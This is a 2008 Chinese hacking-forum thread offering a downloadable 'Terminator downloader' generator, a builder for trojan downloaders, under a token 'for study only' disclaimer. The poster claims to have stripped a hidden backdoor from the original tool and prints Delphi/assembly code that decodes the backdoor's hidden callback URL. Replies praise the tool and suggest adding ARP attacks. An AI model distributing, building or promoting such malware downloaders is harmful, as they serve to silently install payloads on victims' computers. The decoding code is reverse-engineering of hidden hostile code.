找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1477|回复: 2

终结者下载器[去后门]生成器-重写版 By 叫我女王[暗组]

[复制链接]

127

主题

1997

回帖

4346

牛毛

二级牛人

绝情 ! !  !

积分
4346
QQ
发表于 2008-9-7 14:53:26 | 显示全部楼层 来自 广东省惠州市
拥有众多VIP下载者的超强功能

觉得应该加个ARP才算集合了众多VIP下载者的超强功能

11

主题

46

回帖

70

牛毛

初生牛犊

积分
70
发表于 2008-9-8 03:42:29 | 显示全部楼层 来自 陕西省安康市
谢谢,支持您的作品!!

7

主题

117

回帖

173

牛毛

一级牛人

积分
173
QQ
 楼主| 发表于 2008-9-7 14:44:04 | 显示全部楼层 |阅读模式 来自 江西省南昌市
终结者下载器[去后门]生成器-重写版 By 叫我女王[暗组]

声明:本程序只供学习研究使用,如果用于非法用途,后果自负!

终结者下载器,采用C++编写,极大了减少了体积,加壳后才4K,拥有众多VIP下载者的超强功能。

功能介绍中的所有功能都可以使用,没有任何限制!

附加说明:
程序中有多数可疑代码。为了防止不必要的纠纷。。。
这里清楚掉原有的可疑代码。。。
如果你在逆向的时候发现有大量的nop那个就是了。。。

附上解码代码:
复制内容到剪贴板代码:
//把文件的$1064位置的加密字符串--到$00结尾的字符串复制到代码种进行解码
//得到结果:http://1.d5x8.cn/tj.asp
function DeCode(lpBuffer1, lpBuffer2: PChar): Integer; cdecl;
const
arg_0 = $4;
arg_4 = $8;
asm
leave
pushebx
pushesi
mov esi, [esp+8+arg_0]
pushedi
mov edi, esi
orecx, 0FFFFFFFFh
xor eax, eax
xor ebx, ebx
xor edx, edx
repne scasb
not ecx
dec ecx
testecx, ecx
jle @@loc_131****2048

@@loc_13***01B:
mov al, [edx+esi+1]
mov cl, [edx+esi]
add al, 6
sub cl, 8
and al, 0Fh
mov edi, esi
shl cl, 4
add al, cl
mov ecx, [esp+0Ch+arg_4]
mov [ebx+ecx], al
inc ebx
inc edx
orecx, 0FFFFFFFFh
xor eax, eax
inc edx
repne scasb
not ecx
dec ecx
cmp edx, ecx
jl@@loc_13***01B

@@loc_131****2048:
mov eax, [esp+0Ch+arg_4]
pop edi
pop esi
and byte ptr [ebx+eax], 0
xor eax, eax
pop ebx
retn
end;

procedure TForm1.Button1Click(Sender: TObject);
const
//1064
StrUrl =#$7E#$82#$7F#$7E#$7F#$7E#$7F#$7A#$7B#$84#$7A#$89 +
#$7A#$89#$7B#$7B#$7A#$88#$7E#$7E#$7B#$7F#$7F#$82 +
#$7B#$82#$7A#$88#$7E#$7D#$7E#$88#$7A#$89#$7F#$7E +
#$7E#$84#$7A#$88#$7E#$7B#$7F#$7D#$7F#$7A;
var
szBuffer: Array[0..46] Of Char;
szDeBuffer: Array[0..46] Of Char;
begin
ZeroMemory(@szBuffer, SizeOf(szBuffer));
DeCode(StrUrl, @szDeBuffer);
Edit1.Text := PChar(@szDeBuffer);
end;
Builder.JPG

[叫我女王]终结者下载器.rar

622 KB, 下载次数: 44

您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-15 13:15 , Processed in 0.129983 second(s), 31 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表